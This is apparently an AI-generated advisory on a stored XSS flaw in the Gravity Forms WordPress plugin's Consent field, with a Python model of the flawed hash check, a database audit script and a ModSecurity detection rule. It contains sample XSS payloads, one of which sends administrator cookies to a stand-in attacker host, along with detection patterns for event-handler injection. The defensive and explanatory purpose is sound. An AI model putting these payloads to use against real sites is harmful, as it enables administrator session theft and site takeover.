CVE-2026-5113 Overview
CVE-2026-5113 is a Stored Cross-Site Scripting (XSS) vulnerability in the Gravity Forms plugin for WordPress, affecting versions up to and including 2.10.0. The flaw resides in the hidden inputs of the Consent field, where a state validation check fails open: it accepts a submission as long as the wp_kses()-sanitized copy of the input matches the expected state, even though the raw, unsanitized copy is what gets stored. Unauthenticated attackers can therefore inject arbitrary JavaScript that executes in an administrator's browser when the Entries List page is viewed. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation).
Critical Impact
Unauthenticated attackers can inject persistent JavaScript that executes in administrator sessions, enabling account takeover, privilege escalation, and arbitrary actions within the WordPress admin interface.
Affected Products
- Gravity Forms plugin for WordPress, versions up to and including 2.10.0
- Any site running an affected version with at least one public form that contains a Consent field
- Exposure is realized when an administrator (or any user with access to the plugin's Entries List page) views the entry containing the payload
Discovery Timeline
- 2026-05-02 - CVE-2026-5113 published to NVD
- 2026-05-05 - Last updated in NVD database
Technical Details for CVE-2026-5113
Vulnerability Analysis
The vulnerability stems from a flawed state validation mechanism in the Consent field's hidden input handling. Gravity Forms computes two hashes during validation: one over the raw submitted value and one over the same value after it has been passed through wp_kses(). Validation fails only when both hashes diverge from the original state hash; a match on either one is accepted. That gives an attacker a reliable bypass.
When the attacker appends a payload built from tags that wp_kses() removes entirely, such as an <svg> element carrying an event handler, the sanitized copy collapses back to the legitimate label text (the stripped tags leave nothing behind), so its hash matches the state hash. Because the validator does not additionally require the raw hash to match, the submission passes, and the plugin persists the raw, unsanitized consent label to the database.
The second flaw is at output time. When an administrator loads the Entries List page, the plugin reads the stored consent label and renders it into the page without output escaping. The browser parses the injected markup and executes the JavaScript in the administrator's authenticated session.
Root Cause
The root cause is a logical OR in the state validation routine where a logical AND (or a check on the raw hash alone) was needed. By accepting either hash as proof of integrity, the validator lets through raw input that wp_kses() would have neutralized, while storing that raw input rather than the sanitized copy it actually verified. Missing context-aware output encoding on the Entries List page turns the stored value into executable script.
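The following is an added example, not Gravity Forms code, that models the two flaws just described and their fixes. It stands in for the plugin's validator with a small HMAC-based state hash and for wp_kses() with a deliberately simplified allowlist tag stripper (kses_like); the secret, the allowlist, the label text and the payload are all constructed for the demonstration. The vulnerable validator accepts the submission when either hash matches, the fixed one checks the hash of the value that will actually be stored, and the render functions show the missing escape at output time.

```python
"""Model of the fail-open state check (added example; not the plugin's code)."""
import hashlib
import hmac
import html
import re

SECRET = b"constructed-site-secret"  # stand-in for the site's salt; constructed
# Stand-in for wp_kses_allowed_html('post'): a tiny allowlist is enough for the model.
ALLOWED_TAGS = {"a", "b", "strong", "em", "i", "br", "p"}

_TAG = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)[^>]*>")
_EVENT_ATTR = re.compile(r"\s+on[a-zA-Z]+\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)")


def kses_like(value: str) -> str:
    """Simplified wp_kses(): drop tags outside the allowlist entirely (attributes and
    all), and strip on* event-handler attributes from tags that are kept."""
    def keep_or_drop(m: re.Match) -> str:
        if m.group(1).lower() not in ALLOWED_TAGS:
            return ""
        return _EVENT_ATTR.sub("", m.group(0))
    return _TAG.sub(keep_or_drop, value)


def state_hash(value: str) -> str:
    """Hash of the value the form was rendered with (the 'expected state')."""
    return hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()


def validate_vulnerable(submitted: str, expected_hash: str) -> bool:
    """Fails only when BOTH hashes diverge: the OR condition named as the root cause."""
    raw_ok = hmac.compare_digest(state_hash(submitted), expected_hash)
    kses_ok = hmac.compare_digest(state_hash(kses_like(submitted)), expected_hash)
    return raw_ok or kses_ok


def validate_fixed(submitted: str, expected_hash: str) -> bool:
    """The raw value is what gets stored, so only the raw hash may vouch for it."""
    return hmac.compare_digest(state_hash(submitted), expected_hash)


def render_vulnerable(stored_label: str) -> str:
    """Entries List cell rendered without output escaping."""
    return f"<td>{stored_label}</td>"


def render_fixed(stored_label: str) -> str:
    """Same cell with HTML-context escaping (what esc_html() does in WordPress)."""
    return f"<td>{html.escape(stored_label, quote=True)}</td>"


ORIGINAL_LABEL = "I agree to the privacy policy"
# Constructed payload: legitimate label plus a tag wp_kses() strips completely.
PAYLOAD = ORIGINAL_LABEL + "<svg onload=alert(document.cookie)>"


def demo() -> dict:
    expected = state_hash(ORIGINAL_LABEL)
    return {
        "kses_strips_payload": kses_like(PAYLOAD) == ORIGINAL_LABEL,
        "vulnerable_accepts": validate_vulnerable(PAYLOAD, expected),
        "fixed_accepts": validate_fixed(PAYLOAD, expected),
        "fixed_accepts_legit": validate_fixed(ORIGINAL_LABEL, expected),
        "rendered_unescaped": render_vulnerable(PAYLOAD),
        "rendered_escaped": render_fixed(PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running it shows kses_like() reducing the payload back to the original label, validate_vulnerable() accepting it on the strength of that sanitized hash, validate_fixed() rejecting it while still accepting the untouched label, and the escaped rendering carrying no live <svg> tag. The real wp_kses() is far richer than kses_like(); the point the model makes is only that verifying a sanitized copy says nothing about the raw copy you then store.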
Attack Vector
The attack requires no authentication; the only interaction needed is an administrator viewing the entries page. An attacker submits a public-facing form that contains a Consent field, embedding in the hidden consent input a payload built from tags that wp_kses() removes during sanitization. The raw payload is stored with the entry and fires when an administrator reviews submitted entries.
No verified exploit code is publicly available. Refer to the Wordfence Vulnerability Report for additional technical context.
Detection Methods for CVE-2026-5113
Indicators of Compromise
- Form entries whose Consent field values contain HTML tags such as <svg>, <math>, or other elements that wp_kses() strips entirely
- Rows in the wp_gf_entry_meta table (or the equivalent under a non-default table prefix) containing JavaScript event-handler attributes such as onload=, onerror=, or onclick=
- Unexpected outbound requests from administrator browser sessions immediately after the Entries List page is loaded
- New administrator accounts, modified user roles, or other privileged changes made shortly after entry review activity
Detection Strategies
- Audit Gravity Forms entry data for HTML-like content in Consent field values using SQL queries against the WordPress database
- Deploy Web Application Firewall (WAF) rules that flag form submissions containing <svg, <math, or event-handler attributes in Gravity Forms input parameters
- Watch for privileged actions (user creation, role changes, plugin or option updates) and requests to unfamiliar external hosts issued from administrator sessions shortly after /wp-admin/admin.php?page=gf_entries is loaded; browser-side DOM activity is not visible to the server, so a report-only Content-Security-Policy on wp-admin is the closest available signal of unexpected script execution
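The following is an added example, not part of the original page or the plugin, showing the audit query from the first strategy above run against a constructed in-memory SQLite copy of the wp_gf_entry_meta table. The rows are invented, the schema is reduced to the columns the query needs (the real table also carries item_index), and the assumption that the consent label is stored under the field's ".2" sub-input meta_key should be confirmed against your own form before trusting the meta_key filter. The SQL narrows to HTML-looking values (LIKE works identically on MySQL); a Python-side regex then confirms stripped tags or on* handlers, which a LIKE filter cannot express precisely.

```python
"""Audit stored consent labels for XSS payloads (added example; not plugin code)."""
import re
import sqlite3

# Tags wp_kses() drops entirely, plus any inline event-handler attribute.
SUSPICIOUS = re.compile(r"(?i)<\s*(svg|math|script|iframe|object|embed)\b|\bon[a-z]+\s*=")

# Constructed sample rows: (id, form_id, entry_id, meta_key, meta_value)
SAMPLE_ROWS = [
    (1, 7, 101, "3.1", "1"),
    (2, 7, 101, "3.2", "I agree to the privacy policy"),
    (3, 7, 102, "3.1", "1"),
    (4, 7, 102, "3.2", "I agree to the privacy policy"
                       "<svg onload=fetch('//attacker.example/'+document.cookie)>"),
    (5, 7, 103, "3.2", "I agree <b>fully</b>"),  # markup wp_kses() allows; benign
    (6, 7, 104, "3.2", "I agree<math><mi onmouseover=alert(1)>x</mi></math>"),
    (7, 7, 105, "1", "Alice"),                   # unrelated text field, ignored
]

AUDIT_SQL = """
SELECT entry_id, meta_key, meta_value
  FROM wp_gf_entry_meta
 WHERE meta_key LIKE '%.2'                         -- consent label sub-input (assumption)
   AND (meta_value LIKE '%<%' OR meta_value LIKE '%=%')
 ORDER BY entry_id
"""


def load_sample_db() -> sqlite3.Connection:
    """Build the reduced wp_gf_entry_meta table in memory from the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_gf_entry_meta ("
        " id INTEGER PRIMARY KEY, form_id INTEGER, entry_id INTEGER,"
        " meta_key TEXT, meta_value TEXT)"
    )
    conn.executemany("INSERT INTO wp_gf_entry_meta VALUES (?,?,?,?,?)", SAMPLE_ROWS)
    return conn


def audit(conn: sqlite3.Connection) -> list:
    """Return (entry_id, meta_key, evidence) for every consent label that carries a
    stripped tag or an event-handler attribute."""
    hits = []
    for entry_id, meta_key, value in conn.execute(AUDIT_SQL):
        match = SUSPICIOUS.search(value)
        if match:
            hits.append((entry_id, meta_key, match.group(0)))
    return hits


if __name__ == "__main__":
    for entry_id, key, evidence in audit(load_sample_db()):
        print(f"entry {entry_id} meta {key}: {evidence!r}")
```

On the sample data only entries 102 and 104 are reported; entry 103, whose label contains a <b> tag that wp_kses() would have allowed, is correctly left alone. Flagged entry_ids are the ones to quarantine before an administrator opens the Entries List.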
Monitoring Recommendations
- Enable the Gravity Forms logging feature (Forms > Settings > Logging) so submissions are recorded, and review stored entries periodically for suspicious payloads
- Correlate web server access logs with administrator authentication events to identify post-exploitation activity
- Track plugin version inventory across managed WordPress sites to confirm upgrade status
How to Mitigate CVE-2026-5113
Immediate Actions Required
- Upgrade Gravity Forms to the fixed release newer than 2.10.0 identified in the Gravity Forms Change Log as addressing CVE-2026-5113
- Audit existing form entries for stored payloads and quarantine, purge, or neutralize any malicious Consent field values before administrators view them
- Restrict access to the Gravity Forms entries page to the minimum set of administrator accounts that need it
- Invalidate sessions (the "Log Out Everywhere Else" control on the user profile, or wp_destroy_other_sessions()) and reset passwords for administrators who may have viewed compromised entries, then check for administrator accounts or role changes they did not make
Patch Information
Gravity Forms has published version updates documented in the Gravity Forms Change Log. Site operators should apply the latest release that supersedes 2.10.0. Verify the installed version under the WordPress Plugins page after the update completes.
Workarounds
- Disable Consent fields across all active forms until the patch is applied
- Deploy a WAF rule that blocks form submissions containing HTML tags or JavaScript event handlers in Consent field inputs
- Temporarily restrict the Entries List page using IP allowlisting at the web server or reverse proxy layer
# Example ModSecurity rule: reject Gravity Forms submissions (parameters named input_*)
# whose value contains a tag wp_kses() strips or an inline event-handler attribute.
# ARGS values are already URL-decoded; htmlEntityDecode catches &lt;svg style encoding.
# The on[a-z]+= pattern can match ordinary text (e.g. "online="), so tune before enforcing.
SecRule ARGS:/^input_/ "@rx (?i)(<\s*(svg|math|script)\b|\bon[a-z]+\s*=)" \
    "id:1026511301,phase:2,t:none,t:htmlEntityDecode,t:compressWhitespace,deny,status:403,log,msg:'Potential CVE-2026-5113 stored XSS payload in Gravity Forms input'"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.